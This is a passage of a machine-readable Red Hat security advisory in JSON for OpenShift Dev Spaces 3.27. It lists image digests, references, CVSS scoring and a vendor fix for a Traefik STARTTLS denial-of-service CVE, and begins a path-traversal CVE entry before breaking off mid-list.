"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25949"
},
{
"category": "external",
"summary": "RHBZ#2439522",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439522"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25949",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25949"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25949",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25949"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678",
"url": "https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/releases/tag/v3.6.8",
"url": "https://github.com/traefik/traefik/releases/tag/v3.6.8"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w"
}
],
"release_date": "2026-02-12T20:01:19.600000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/traefik/traefik: Traefik: Denial of Service via stalled STARTTLS requests"
},
{
"cve": "CVE-2026-26960",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-20T02:01:07.883769+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
